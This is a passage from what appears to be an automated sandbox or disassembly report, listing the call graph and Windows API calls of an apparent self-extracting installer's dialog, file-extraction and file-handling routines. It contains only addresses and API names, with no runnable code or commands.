calls _free 25344 bcdca1 DialogBoxParamW 25345 be08a0 IsProcessorFeaturePresent 25346 bdb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25380 bcb18d 78 API calls 25348 bcc793 97 API calls 4 library calls 25402 bcc793 102 API calls 4 library calls 25382 bc9580 6 API calls 25350 bd2cfb 38 API calls 4 library calls 25383 bb95f0 80 API calls 25403 bb5ef0 82 API calls 24314 bd98f0 24322 bdadaf 24314->24322 24317 bd9904 24319 bd990c 24320 bd9919 24319->24320 24330 bd9920 11 API calls 24319->24330 24323 bdac98 _abort 5 API calls 24322->24323 24324 bdadd6 24323->24324 24325 bdadee TlsAlloc 24324->24325 24326 bdaddf 24324->24326 24325->24326 24327 bcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24326->24327 24328 bd98fa 24327->24328 24328->24317 24329 bd9869 20 API calls 2 library calls 24328->24329 24329->24319 24330->24317 24331 bdabf0 24332 bdabfb 24331->24332 24333 bdaf0a 11 API calls 24332->24333 24334 bdac24 24332->24334 24335 bdac20 24332->24335 24333->24332 24337 bdac50 DeleteCriticalSection 24334->24337 24337->24335 25351 bd88f0 7 API calls ___scrt_uninitialize_crt 25385 bcfd4f 9 API calls 2 library calls 25386 bbf1e8 FreeLibrary 24357 bb13e1 84 API calls 2 library calls 24358 bceae7 24359 bceaf1 24358->24359 24360 bce85d ___delayLoadHelper2@8 14 API calls 24359->24360 24361 bceafe 24360->24361 25353 bcf4e7 29 API calls _abort 24362 bcb7e0 24363 bcb7ea __EH_prolog 24362->24363 24530 bb1316 24363->24530 24366 bcb841 24367 bcbf0f 24595 bcd69e 24367->24595 24368 bcb82a 24368->24366 24370 bcb838 24368->24370 24371 bcb89b 24368->24371 24374 bcb83c 24370->24374 24375 bcb878 24370->24375 24373 bcb92e GetDlgItemTextW 24371->24373 24378 bcb8b1 24371->24378 24373->24375 24381 bcb96b 24373->24381 24374->24366 24384 bbe617 53 API calls 24374->24384 24375->24366 24386 bcb95f KiUserCallbackDispatcher 24375->24386 24376 bcbf38 24379 bcbf41 SendDlgItemMessageW 24376->24379 24380 bcbf52 GetDlgItem SendMessageW 24376->24380 24377 bcbf2a SendMessageW 24377->24376 24383 bbe617 53 API calls 24378->24383 24379->24380 24613 bca64d GetCurrentDirectoryW 24380->24613 24382 bcb980 GetDlgItem 24381->24382 24528 bcb974 24381->24528 24387 bcb994 SendMessageW SendMessageW 24382->24387 24388 bcb9b7 SetFocus 24382->24388 24389 bcb8ce SetDlgItemTextW 24383->24389 24390 bcb85b 24384->24390 24386->24366 24387->24388 24392 bcb9c7 24388->24392 24408 bcb9e0 24388->24408 24393 bcb8d9 24389->24393 24635 bb124f SHGetMalloc 24390->24635 24391 bcbf82 GetDlgItem 24395 bcbf9f 24391->24395 24396 bcbfa5 SetWindowTextW 24391->24396 24397 bbe617 53 API calls 24392->24397 24393->24366 24401 bcb8e6 GetMessageW 24393->24401 24395->24396 24614 bcabab GetClassNameW 24396->24614 24402 bcb9d1 24397->24402 24398 bcb862 24398->24366 24409 bcc1fc SetDlgItemTextW 24398->24409 24399 bcbe55 24403 bbe617 53 API calls 24399->24403 24401->24366 24406 bcb8fd IsDialogMessageW 24401->24406 24636 bcd4d4 24402->24636 24410 bcbe65 SetDlgItemTextW 24403->24410 24406->24393 24411 bcb90c TranslateMessage DispatchMessageW 24406->24411 24415 bbe617 53 API calls 24408->24415 24409->24366 24412 bcbe79 24410->24412 24411->24393 24416 bbe617 53 API calls 24412->24416 24414 bcb9d9 24540 bba0b1 24414->24540 24418 bcba17 24415->24418 24452 bcbe9c _wcslen 24416->24452 24417 bcbff0 24421 bcc020 24417->24421 24424 bbe617 53 API calls 24417->24424 24419 bb4092 _swprintf 51 API calls 24418->24419 24423 bcba29 24419->24423 24420 bcc73f 97 API calls 24420->24417 24431 bcc73f 97 API calls 24421->24431 24470 bcc0d8 24421->24470 24426 bcd4d4 16 API calls 24423->24426 24428 bcc003 SetDlgItemTextW 24424->24428 24426->24414 24427 bcc18b 24432 bcc19d 24427->24432 24433 bcc194 EnableWindow 24427->24433 24435 bbe617 53 API calls 24428->24435 24429 bcba68 GetLastError 24430 bcba73 24429->24430 24546 bcac04 SetCurrentDirectoryW 24430->24546 24437 bcc03b 24431->24437 24438 bcc1ba 24432->24438 24654 bb12d3 GetDlgItem EnableWindow 24432->24654 24433->24432 24434 bcbeed 24441 bbe617 53 API calls 24434->24441 24439 bcc017 SetDlgItemTextW 24435->24439 24442 bcc04d 24437->24442 24475 bcc072 24437->24475 24445 bcc1e1 24438->24445 24460 bcc1d9 SendMessageW 24438->24460 24439->24421 24440 bcba87 24446 bcba90 GetLastError 24440->24446 24447 bcba9e 24440->24447 24441->24366 24652 bc9ed5 32 API calls 24442->24652 24443 bcc0cb 24448 bcc73f 97 API calls 24443->24448 24445->24366 24453 bbe617 53 API calls 24445->24453 24446->24447 24450 bcbb11 24447->24450 24454 bcbaae GetTickCount 24447->24454 24455 bcbb20 24447->24455 24448->24470 24450->24455 24457 bcbd56 24450->24457 24451 bcc1b0 24655 bb12d3 GetDlgItem EnableWindow 24451->24655 24452->24434 24456 bbe617 53 API calls 24452->24456 24453->24398 24462 bb4092 _swprintf 51 API calls 24454->24462 24465 bcbcfb 24455->24465 24466 bcbb39 GetModuleFileNameW 24455->24466 24467 bcbcf1 24455->24467 24463 bcbed0 24456->24463 24555 bb12f1 GetDlgItem ShowWindow 24457->24555 24458 bcc066 24458->24475 24460->24445 24469 bcbac7 24462->24469 24471 bb4092 _swprintf 51 API calls 24463->24471 24464 bcc169 24653 bc9ed5 32 API calls 24464->24653 24474 bbe617 53 API calls 24465->24474 24646 bbf28c 82 API calls 24466->24646 24467->24375 24467->24465 24468 bcbd66 24556 bb12f1 GetDlgItem ShowWindow 24468->24556 24547 bb966e 24469->24547 24470->24427 24470->24464 24477 bbe617 53 API calls 24470->24477 24471->24434 24480 bcbd05 24474->24480 24475->24443 24481 bcc73f 97 API calls 24475->24481 24477->24470 24478 bcc188 24478->24427 24479 bcbb5f 24483 bb4092 _swprintf 51 API calls 24479->24483 24484 bb4092 _swprintf 51 API calls 24480->24484 24485 bcc0a0 24481->24485 24482 bcbd70 24486 bbe617 53 API calls 24482->24486 24488 bcbb81 CreateFileMappingW 24483->24488 24489 bcbd23 24484->24489 24485->24443 24490 bcc0a9 DialogBoxParamW 24485->24490 24491 bcbd7a SetDlgItemTextW 24486->24491 24493 bcbbe3 GetCommandLineW 24488->24493 24522 bcbc60 __InternalCxxFrameHandler 24488->24522 24502 bbe617 53 API calls 24489->24502 24490->24375 24490->24443 24557 bb12f1 GetDlgItem ShowWindow 24491->24557 24492 bcbaed 24496 bcbaf4 GetLastError 24492->24496 24497 bcbaff 24492->24497 24498 bcbbf4 24493->24498 24494 bcbc6b ShellExecuteExW 24520 bcbc88 24494->24520 24496->24497 24500 bb959a 80 API calls 24497->24500 24647 bcb425 SHGetMalloc 24498->24647 24499 bcbd8c SetDlgItemTextW GetDlgItem 24503 bcbda9 GetWindowLongW SetWindowLongW 24499->24503 24504 bcbdc1 24499->24504 24500->24450 24506 bcbd3d 24502->24506 24503->24504 24558 bcc73f 24504->24558 24505 bcbc10 24648 bcb425 SHGetMalloc 24505->24648 24510 bcbc1c 24649 bcb425 SHGetMalloc 24510->24649 24511 bcbccb 24511->24467 24518 bcbce1 UnmapViewOfFile CloseHandle 24511->24518 24512 bcc73f 97 API calls 24515 bcbddd 24512->24515 24514 bcbc28 24650 bbf3fa 82 API calls 2 library calls 24514->24650 24583 bcda52 24515->24583 24518->24467 24519 bcbc3f MapViewOfFile 24519->24522 24520->24511 24523 bcbcb7 Sleep 24520->24523 24522->24494 24523->24511 24523->24520 24524 bcc73f 97 API calls 24527 bcbe03 24524->24527 24525 bcbe2c 24651 bb12d3 GetDlgItem EnableWindow 24525->24651 24527->24525 24529 bcc73f 97 API calls 24527->24529 24528->24375 24528->24399 24529->24525 24531 bb1378 24530->24531 24532 bb131f 24530->24532 24657 bbe2c1 GetWindowLongW SetWindowLongW 24531->24657 24533 bb1385 24532->24533 24656 bbe2e8 62 API calls 2 library calls 24532->24656 24533->24366 24533->24367 24533->24368 24536 bb1341 24536->24533 24537 bb1354 GetDlgItem 24536->24537 24537->24533 24538 bb1364 24537->24538 24538->24533 24539 bb136a SetWindowTextW 24538->24539 24539->24533 24543 bba0bb 24540->24543 24541 bba14c 24542 bba2b2 8 API calls 24541->24542 24544 bba175 24541->24544 24542->24544 24543->24541 24543->24544 24658 bba2b2 24543->24658 24544->24429 24544->24430 24546->24440 24548 bb9678 24547->24548 24549 bb96d5 CreateFileW 24548->24549 24550 bb96c9 24548->24550 24549->24550 24551 bb971f 24550->24551 24552 bbbb03 GetCurrentDirectoryW 24550->24552 24551->24492 24553 bb9704 24552->24553 24553->24551 24554 bb9708 CreateFileW 24553->24554 24554->24551 24555->24468 24556->24482 24557->24499 24559 bcc749 __EH_prolog 24558->24559 24560 bcbdcf 24559->24560 24690 bcb314 24559->24690 24560->24512 24563 bcb314 ExpandEnvironmentStringsW 24569 bcc780 _wcslen _wcsrchr 24563->24569 24564 bcca67 SetWindowTextW 24564->24569 24569->24560 24569->24563 24569->24564 24570 bcc855 SetFileAttributesW 24569->24570 24575 bccc31 GetDlgItem SetWindowTextW SendMessageW 24569->24575 24578 bccc71 SendMessageW 24569->24578 24694 bc1fbb CompareStringW 24569->24694 24695 bca64d GetCurrentDirectoryW 24569->24695 24697 bba5d1 6 API calls 24569->24697 24698 bba55a FindClose 24569->24698 24699 bcb48e 76 API calls 2 library calls 24569->24699 24700 bd3e3e 24569->24700 24572 bcc90f GetFileAttributesW 24570->24572 24582 bcc86f _abort _wcslen 24570->24582 24572->24569 24574 bcc921 DeleteFileW 24572->24574 24574->24569 24576 bcc932 24574->24576 24575->24569 24577 bb4092 _swprintf 51 API calls 24576->24577 24579 bcc952 GetFileAttributesW 24577->24579 24578->24569 24579->24576 24580 bcc967 MoveFileW 24579->24580 24580->24569 24581 bcc97f MoveFileExW 24580->24581 24581->24569 24582->24569 24582->24572 24696 bbb991 51 API calls 2 library calls 24582->24696 24584 bcda5c __EH_prolog 24583->24584 24715 bc0659 24584->24715 24586 bcda8d 24719 bb5b3d 24586->24719 24588 bcdaab 24723 bb7b0d 24588->24723 24592 bcdafe 24739 bb7b9e 24592->24739 24594 bcbdee 24594->24524 24596 bcd6a8 24595->24596 24597 bca5c6 4 API calls 24596->24597 24598 bcd6ad 24597->24598 24599 bcd6b5 GetWindow 24598->24599 24600 bcbf15 24598->24600 24599->24600 24603 bcd6d5 24599->24603 24600->24376 24600->24377 24601 bcd6e2 GetClassNameW 25222 bc1fbb CompareStringW 24601->25222 24603->24600 24603->24601 24604 bcd76a GetWindow 24603->24604 24605 bcd706 GetWindowLongW 24603->24605 24604->24600 24604->24603 24605->24604 24606 bcd716 SendMessageW 24605->24606 24606->24604 24607 bcd72c GetObjectW 24606->24607 25223 bca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24607->25223 24609 bcd743 25224 bca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24609->25224 25225 bca80c 8 API calls 24609->25225 24612 bcd754 SendMessageW DeleteObject 24612->24604 24613->24391 24615 bcabcc 24614->24615 24616 bcabf1 24614->24616 25226 bc1fbb CompareStringW 24615->25226 24617 bcabff 24616->24617 24618 bcabf6 SHAutoComplete 24616->24618 24622 bcb093 24617->24622 24618->24617 24620 bcabdf 24620->24616 24621 bcabe3 FindWindowExW 24620->24621 24621->24616 24623 bcb09d __EH_prolog 24622->24623 24624 bb13dc 84 API calls 24623->24624 24625 bcb0bf 24624->24625 25227 bb1fdc 24625->25227 24628 bcb0d9 24630 bb1692 86 API calls 24628->24630 24629 bcb0eb 24631 bb19af 128 API calls 24629->24631 24633 bcb0e4 24630->24633 24634 bcb10d __InternalCxxFrameHandler ___std_exception_copy 24631->24634 24632 bb1692 86 API calls 24632->24633 24633->24417 24633->24420 24634->24632 24635->24398 25235 bcb568 PeekMessageW 24636->25235 24639 bcd536 SendMessageW SendMessageW 24641 bcd591 SendMessageW SendMessageW SendMessageW 24639->24641 24642 bcd572 24639->24642 24640 bcd502 24643 bcd50d ShowWindow SendMessageW SendMessageW 24640->24643 24644 bcd5c4 SendMessageW 24641->24644 24645 bcd5e7 SendMessageW 24641->24645 24642->24641 24643->24639 24644->24645 24645->24414 24646->24479 24647->24505 24648->24510 24649->24514 24650->24519 24651->24528 24652->24458 24653->24478 24654->24451 24655->24438 24656->24536 24657->24533 24659 bba2bf 24658->24659 24660 bba2e3 24659->24660 24661 bba2d6 CreateDirectoryW 24659->24661 24679 bba231 24660->24679 24661->24660 24663 bba316 24661->24663 24665 bba325 24663->24665 24671 bba4ed 24663->24671 24665->24543 24666 bba329 GetLastError 24666->24665 24668 bbbb03 GetCurrentDirectoryW 24669 bba2ff 24668->24669 24669->24666 24670 bba303 CreateDirectoryW 24669->24670 24670->24663 24670->24666 24672 bcec50 24671->24672 24673 bba4fa SetFileAttributesW 24672->24673 24674 bba53d 24673->24674 24675 bba510 24673->24675 24674->24665 24676 bbbb03 GetCurrentDirectoryW 24675->24676 24677 bba524 24676->24677 24677->24674 24678 bba528 SetFileAttributesW 24677->24678 24678->24674 24682 bba243 24679->24682 24683 bcec50 24682->24683 24684 bba250 GetFileAttributesW 24683->24684 24685 bba23a 24684->24685 24686 bba261 24684->24686 24685->24666 24685->24668 24687 bbbb03 GetCurrentDirectoryW 24686->24687 24688 bba275 24687->24688 24688->24685 24689 bba279 GetFileAttributesW 24688->24689 24689->24685 24691 bcb31e 24690->24691 24692 bcb3f0 ExpandEnvironmentStringsW 24691->24692 24693 bcb40d 24691->24693 24692->24693 24693->24569 24694->24569 24695->24569 24696->24582 24697->24569 24698->24569 24699->24569 24701 bd8e54 24700->24701 24702 bd8e6c 24701->24702 24703 bd8e61 24701->24703 24705 bd8e74 24702->24705 24711 bd8e7d _abort 24702->24711 24704 bd8e06 __vswprintf_c_l 21 API calls 24703->24704 24709 bd8e69 24704->24709 24706 bd8dcc _free 20 API calls 24705->24706 24706->24709 24707 bd8ea7 HeapReAlloc 24707->24709 24707->24711 24708 bd8e82 24713 bd91a8 20 API calls _abort 24708->24713 24709->24569 24711->24707 24711->24708 24714 bd7a5e 7 API calls 2 library calls 24711->24714 24713->24709 24714->24711 24716 bc0666 _wcslen 24715->24716 24743 bb17e9 24716->24743 24718 bc067e 24718->24586 24720 bc0659 _wcslen 24719->24720 24721 bb17e9 78 API calls 24720->24721 24722 bc067e 24721->24722 24722->24588 24724 bb7b17 __EH_prolog 24723->24724 24760 bbce40 24724->24760 24726 bb7b32 24727 bceb38 8 API calls 24726->24727 24728 bb7b5c 24727->24728 24766 bc4a76 24728->24766 24731 bb7c7d 24732 bb7c87 24731->24732 24734 bb7cf1 24732->24734 24795 bba56d 24732->24795 24736 bb7d50 24734->24736 24773 bb8284 24734->24773 24735 bb7d92 24735->24592 24736->24735 24801 bb138b 74 API calls 24736->24801 24740 bb7bac 24739->24740 24741 bb7bb3 24739->24741 24742 bc2297 86 API calls 24740->24742 24742->24741 24745 bb17ff 24743->24745 24755 bb185a __InternalCxxFrameHandler 24743->24755 24744 bb1828 24746 bb1887 24744->24746 24752 bb1847 ___std_exception_copy 24744->24752 24745->24744 24756 bb6c36 76 API calls __vswprintf_c_l 24745->24756 24748 bd3e3e 22 API calls 24746->24748 24751 bb188e 24748->24751 24749 bb181e 24757 bb6ca7 75 API calls 24749->24757 24751->24755 24759 bb6ca7 75 API calls 24751->24759 24752->24755 24758 bb6ca7 75 API calls 24752->24758 24755->24718 24756->24749 24757->24744 24758->24755 24759->24755 24761 bbce4a __EH_prolog 24760->24761 24762 bceb38 8 API calls 24761->24762 24763 bbce8d 24762->24763 24764 bceb38 8 API calls 24763->24764 24765 bbceb1 24764->24765 24765->24726 24767 bc4a80 __EH_prolog 24766->24767 24768 bceb38 8 API calls 24767->24768 24769 bc4a9c 24768->24769 24770 bb7b8b 24769->24770 24772 bc0e46 80 API calls 24769->24772 24770->24731 24772->24770 24774 bb828e __EH_prolog 24773->24774 24802 bb13dc 24774->24802 24776 bb82aa 24777 bb82bb 24776->24777 24945 bb9f42 24776->24945 24780 bb82f2 24777->24780 24810 bb1a04 24777->24810 24941 bb1692 24780->24941 24783 bb8389 24829 bb8430 24783->24829 24786 bb83e8 24837 bb1f6d 24786->24837 24790 bb82ee 24790->24780 24790->24783 24792 bba56d 7 API calls 24790->24792 24949 bbc0c5 CompareStringW _wcslen 24790->24949 24791 bb83f3 24791->24780 24841 bb3b2d 24791->24841 24853 bb848e 24791->24853 24792->24790 24796 bba582 24795->24796 24797 bba5b0 24796->24797 25211 bba69b 24796->25211 24797->24732 24799 bba592 24799->24797 24800 bba597 FindClose 24799->24800 24800->24797 24801->24735 24803 bb13e1 __EH_prolog 24802->24803 24804 bbce40 8 API calls 24803->24804 24805 bb1419 24804->24805 24806 bceb38 8 API calls 24805->24806 24809 bb1474 _abort 24805->24809 24807 bb1461 24806->24807 24807->24809 24950 bbb505 24807->24950 24809->24776 24811 bb1a0e __EH_prolog 24810->24811 24823 bb1a61 24811->24823 24826 bb1b9b 24811->24826 24966 bb13ba 24811->24966 24814 bb1bc7 24969 bb138b 74 API calls 24814->24969 24816 bb3b2d 101 API calls 24820 bb1c12 24816->24820 24817 bb1bd4 24817->24816 24817->24826 24818 bb1c5a 24822 bb1c8d 24818->24822 24818->24826 24970 bb138b 74 API calls 24818->24970 24820->24818 24821 bb3b2d 101 API calls 24820->24821 24821->24820 24822->24826 24827 bb9e80 79 API calls 24822->24827 24823->24814 24823->24817 24823->24826 24824 bb3b2d 101 API calls 24825 bb1cde 24824->24825 24825->24824 24825->24826 24826->24790 24827->24825 24828 bb9e80 79 API calls 24828->24823 24988 bbcf3d 24829->24988 24831 bb8440 24992 bc13d2 GetSystemTime SystemTimeToFileTime 24831->24992 24833 bb83a3 24833->24786 24834 bc1b66 24833->24834 24993 bcde6b 24834->24993 24838 bb1f72 __EH_prolog 24837->24838 24840 bb1fa6 24838->24840 25001 bb19af 24838->25001 24840->24791 24842 bb3b39 24841->24842 24843 bb3b3d 24841->24843 24842->24791 24852 bb9e80 79 API calls 24843->24852 24844 bb3b4f 24845 bb3b6a 24844->24845 24846 bb3b78 24844->24846 24851 bb3baa 24845->24851 25133 bb32f7 89 API calls 2 library calls 24845->25133 25134 bb286b 101 API calls 3 library calls 24846->25134 24849 bb3b76 24849->24851 25135 bb20d7 74 API calls 24849->25135 24851->24791 24852->24844 24854 bb8498 __EH_prolog 24853->24854 24857 bb84d5 24854->24857 24864 bb8513 24854->24864 25160 bc8c8d 103 API calls 24854->25160 24856 bb84f5 24858 bb84fa 24856->24858 24859 bb851c 24856->24859 24857->24856 24862 bb857a 24857->24862 24857->24864 24858->24864 25161 bb7a0d 152 API calls 24858->25161 24859->24864 25162 bc8c8d 103 API calls 24859->25162 24862->24864 25136 bb5d1a 24862->25136 24864->24791 24865 bb8605 24865->24864 25142 bb8167 24865->25142 24867 bb8797 24869 bba56d 7 API calls 24867->24869 24870 bb8802 24867->24870 24869->24870 25148 bb7c0d 24870->25148 24872 bbd051 82 API calls 24878 bb885d 24872->24878 24873 bb898b 25165 bb2021 74 API calls 24873->25165 24874 bb8a5f 24879 bb8ab6 24874->24879 24894 bb8a6a 24874->24894 24875 bb8992 24875->24874 24881 bb89e1 24875->24881 24878->24864 24878->24872 24878->24873 24878->24875 25163 bb8117 84 API calls 24878->25163 25164 bb2021 74 API calls 24878->25164 24886 bb8a4c 24879->24886 25168 bb7fc0 97 API calls 24879->25168 24880 bb8ab4 24887 bb959a 80 API calls 24880->24887 24883 bb8b14 24881->24883 24881->24886 24888 bba231 3 API calls 24881->24888 24882 bb9105 24885 bb959a 80 API calls 24882->24885 24883->24882 24884 bb8b82 24883->24884 25169 bb98bc 24883->25169 24892 bbab1a 8 API calls 24884->24892 24885->24864 24886->24880 24886->24883 24887->24864 24890 bb8a19 24888->24890 24890->24886 25166 bb92a3 97 API calls 24890->25166 24895 bb8bd1 24892->24895 24894->24880 25167 bb7db2 101 API calls 24894->25167 24897 bbab1a 8 API calls 24895->24897 24912 bb8be7 24897->24912 24900 bb8b70 25173 bb6e98 77 API calls 24900->25173 24902 bb8cbc 24903 bb8d18 24902->24903 24904 bb8e40 24902->24904 24905 bb8d8a 24903->24905 24906 bb8d28 24903->24906 24907 bb8e52 24904->24907 24908 bb8e66 24904->24908 24927 bb8d49 24904->24927 24913 bb8167 19 API calls 24905->24913 24909 bb8d6e 24906->24909 24917 bb8d37 24906->24917 24910 bb9215 123 API calls 24907->24910 24911 bc3377 75 API calls 24908->24911 24909->24927 25176 bb77b8 111 API calls 24909->25176 24910->24927 24914 bb8e7f 24911->24914 24912->24902 24915 bb8c93 24912->24915 24922 bb981a 79 API calls 24912->24922 24916 bb8dbd 24913->24916 25179 bc3020 123 API calls 24914->25179 24915->24902 25174 bb9a3c 82 API calls 24915->25174 24923 bb8de6 24916->24923 24924 bb8df5 24916->24924 24916->24927 25175 bb2021 74 API calls 24917->25175 24922->24915 25177 bb7542 85 API calls 24923->25177 25178 bb9155 93 API calls __EH_prolog 24924->25178 24930 bb8f85 24927->24930 25180 bb2021 74 API calls 24927->25180 24929 bb9090 24929->24882 24932 bba4ed 3 API calls 24929->24932 24930->24882 24930->24929 24931 bb903e 24930->24931 25154 bb9f09 SetEndOfFile 24930->25154 25155 bb9da2 24931->25155 24935 bb90eb 24932->24935 24935->24882 25181 bb2021 74 API calls 24935->25181 24936 bb9085 24938 bb9620 77 API calls 24936->24938 24938->24929 24939 bb90fb 25182 bb6dcb 76 API calls 24939->25182 24942 bb16a4 24941->24942 25198 bbcee1 24942->25198 24946 bb9f59 24945->24946 24947 bb9f63 24946->24947 25210 bb6d0c 78 API calls 24946->25210 24947->24777 24949->24790 24951 bbb50f __EH_prolog 24950->24951 24956 bbf1d0 82 API calls 24951->24956 24953 bbb521 24957 bbb61e 24953->24957 24956->24953 24958 bbb630 _abort 24957->24958 24961 bc10dc 24958->24961 24964 bc109e GetCurrentProcess GetProcessAffinityMask 24961->24964 24965 bbb597 24964->24965 24965->24809 24971 bb1732 24966->24971 24968 bb13d6 24968->24828 24969->24826 24970->24822 24972 bb1748 24971->24972 24983 bb17a0 __InternalCxxFrameHandler 24971->24983 24973 bb1771 24972->24973 24984 bb6c36 76 API calls __vswprintf_c_l 24972->24984 24974 bb17c7 24973->24974 24980 bb178d ___std_exception_copy 24973->24980 24977 bd3e3e 22 API calls 24974->24977 24976 bb1767 24985 bb6ca7 75 API calls 24976->24985 24978 bb17ce 24977->24978 24978->24983 24987 bb6ca7 75 API calls 24978->24987 24980->24983 24986 bb6ca7 75 API calls 24980->24986 24983->24968 24984->24976 24985->24973 24986->24983 24987->24983 24989 bbcf4d 24988->24989 24991 bbcf54 24988->24991 24990 bb981a 79 API calls 24989->24990 24990->24991 24991->24831 24992->24833 24994 bcde78 24993->24994 24995 bbe617 53 API calls 24994->24995 24996 bcde9b 24995->24996 24997 bb4092 _swprintf 51 API calls 24996->24997 24998 bcdead 24997->24998 24999 bcd4d4 16 API calls 24998->24999 25000 bc1b7c 24999->25000 25000->24786 25002 bb19bb 25001->25002 25003 bb19bf 25001->25003 25002->24840 25006 bb9e80 79 API calls 25003->25006 25004 bb19d4 25007 bb18f6 25004->25007 25006->25004 25008 bb1945 25007->25008 25009 bb1908 25007->25009 25015 bb3fa3 25008->25015 25010 bb3b2d 101 API calls 25009->25010 25013 bb1928 25010->25013 25013->25002 25017 bb3fac 25015->25017 25016 bb3b2d 101 API calls 25016->25017 25017->25016 25019 bb1966 25017->25019 25032 bc0e08 25017->25032 25019->25013 25020 bb1e50 25019->25020 25021 bb1e5a __EH_prolog 25020->25021 25040 bb3bba 25021->25040 25023 bb1e84 25024 bb1732 78 API calls 25023->25024 25026 bb1f0b 25023->25026 25025 bb1e9b 25024->25025 25068 bb18a9 78 API calls 25025->25068 25026->25013 25028 bb1eb3 25030 bb1ebf _wcslen 25028->25030 25069 bc1b84 MultiByteToWideChar 25028->25069 25070 bb18a9 78 API calls 25030->25070 25033 bc0e0f 25032->25033 25035 bc0e2a 25033->25035 25038 bb6c31 RaiseException _com_raise_error 25033->25038 25034 bc0e3b SetThreadExecutionState 25034->25017 25035->25034 25039 bb6c31 RaiseException _com_raise_error 25035->25039 25038->25035 25039->25034 25041 bb3bc4 __EH_prolog 25040->25041 25042 bb3bda 25041->25042 25043 bb3bf6 25041->25043 25096 bb138b 74 API calls 25042->25096 25045 bb3e51 25043->25045 25048 bb3c22 25043->25048 25113 bb138b 74 API calls 25045->25113 25047 bb3be5 25047->25023 25048->25047 25071 bc3377 25048->25071 25050 bb3ca3 25051 bb3d2e 25050->25051 25067 bb3c9a 25050->25067 25099 bbd051 25050->25099 25081 bbab1a 25051->25081 25052 bb3c9f 25052->25050 25098 bb20bd 78 API calls 25052->25098 25054 bb3c8f 25097 bb138b 74 API calls 25054->25097 25055 bb3c71 25055->25050 25055->25052 25055->25054 25057 bb3d41 25061 bb3dd7 25057->25061 25062 bb3dc7 25057->25062 25105 bc3020 123 API calls 25061->25105 25085 bb9215 25062->25085 25065 bb3dd5 25065->25067 25106 bb2021 74 API calls 25065->25106 25107 bc2297 25067->25107 25068->25028 25069->25030 25070->25026 25072 bc338c 25071->25072 25074 bc3396 ___std_exception_copy 25071->25074 25114 bb6ca7 75 API calls 25072->25114 25075 bc34c6 25074->25075 25076 bc341c 25074->25076 25080 bc3440 _abort 25074->25080 25116 bd238d RaiseException 25075->25116 25115 bc32aa 75 API calls 3 library calls 25076->25115 25079 bc34f2 25080->25055 25082 bbab28 25081->25082 25084 bbab32 25081->25084 25083 bceb38 8 API calls 25082->25083 25083->25084 25084->25057 25086 bb921f __EH_prolog 25085->25086 25117 bb7c64 25086->25117 25089 bb13ba 78 API calls 25090 bb9231 25089->25090 25120 bbd114 25090->25120 25092 bb928a 25092->25065 25093 bb9243 25093->25092 25095 bbd114 118 API calls 25093->25095 25129 bbd300 97 API calls __InternalCxxFrameHandler 25093->25129 25095->25093 25096->25047 25097->25067 25098->25050 25100 bbd072 25099->25100 25101 bbd084 25099->25101 25130 bb603a 82 API calls 25100->25130 25131 bb603a 82 API calls 25101->25131 25104 bbd07c 25104->25051 25105->25065 25106->25067 25108 bc22a1 25107->25108 25109 bc22ba 25108->25109 25112 bc22ce 25108->25112 25132 bc0eed 86 API calls 25109->25132 25111 bc22c1 25111->25112 25113->25047 25114->25074 25115->25080 25116->25079 25118 bbb146 GetVersionExW 25117->25118 25119 bb7c69 25118->25119 25119->25089 25126 bbd12a __InternalCxxFrameHandler 25120->25126 25121 bbd29a 25122 bbd0cb 6 API calls 25121->25122 25123 bbd2ce 25121->25123 25122->25123 25124 bc0e08 SetThreadExecutionState RaiseException 25123->25124 25127 bbd291 25124->25127 25125 bc8c8d 103 API calls 25125->25126 25126->25121 25126->25125 25126->25127 25128 bbac05 91 API calls 25126->25128 25127->25093 25128->25126 25129->25093 25130->25104 25131->25104 25132->25111 25133->24849 25134->24849 25135->24851 25137 bb5d2a 25136->25137 25183 bb5c4b 25137->25183 25140 bb5d5d 25141 bb5d95 25140->25141 25188 bbb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25140->25188 25141->24865 25143 bb8186 25142->25143 25144 bb8232 25143->25144 25195 bbbe5e 19 API calls __InternalCxxFrameHandler 25143->25195 25194 bc1fac CharUpperW 25144->25194 25147 bb823b 25147->24867 25149 bb7c22 25148->25149 25150 bb7c5a 25149->25150 25196 bb6e7a 74 API calls 25149->25196 25150->24878 25152 bb7c52 25197 bb138b 74 API calls 25152->25197 25154->24931 25156 bb9db3 25155->25156 25157 bb9dc2 25155->25157 25156->25157 25158 bb9db9 FlushFileBuffers 25156->25158 25159 bb9e3f SetFileTime 25157->25159 25158->25157 25159->24936 25160->24857 25161->24864 25162->24864 25163->24878 25164->24878 25165->24875 25166->24886 25167->24880 25168->24886 25170 bb8b5a 25169->25170 25171 bb98c5 GetFileType 25169->25171 25170->24884 25172 bb2021 74 API calls 25170->25172 25171->25170 25172->24900 25173->24884 25174->24902 25175->24927 25176->24927 25177->24927 25178->24927 25179->24927 25180->24930 25181->24939 25182->24882 25189 bb5b48 25183->25189 25185 bb5c6c 25185->25140 25187 bb5b48 2 API calls 25187->25185 25188->25140 25191 bb5b52 25189->25191 25190 bb5c3a 25190->25185 25190->25187 25191->25190 25193 bbb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25191->25193 25193->25191 25194->25147 25195->25144 25196->25152 25197->25150 25201 bbcef2 25198->25201 25200 bbcf24 25202 bba99e 86 API calls 25200->25202 25204 bba99e 25201->25204 25203 bbcf2f 25202->25203 25205 bba9c1 25204->25205 25208 bba9d5 25204->25208 25209 bc0eed 86 API calls 25205->25209 25207 bba9c8 25207->25208 25208->25200 25209->25207 25210->24947 25212 bba6a8 25211->25212 25213 bba6c1 FindFirstFileW 25212->25213 25214 bba727 FindNextFileW 25212->25214 25215 bba6d0 25213->25215 25221 bba709 25213->25221 25216 bba732 GetLastError 25214->25216 25214->25221 25217 bbbb03 GetCurrentDirectoryW 25215->25217 25216->25221 25218 bba6e0 25217->25218 25219 bba6fe GetLastError 25218->25219 25220 bba6e4 FindFirstFileW 25218->25220 25219->25221 25220->25219 25220->25221 25221->24799 25222->24603 25223->24609 25224->24609 25225->24612 25226->24620 25228 bb9f42 78 API calls 25227->25228 25229 bb1fe8 25228->25229 25230 bb1a04 101 API calls 25229->25230 25233 bb2005 25229->25233 25231 bb1ff5 25230->25231 25231->25233 25234 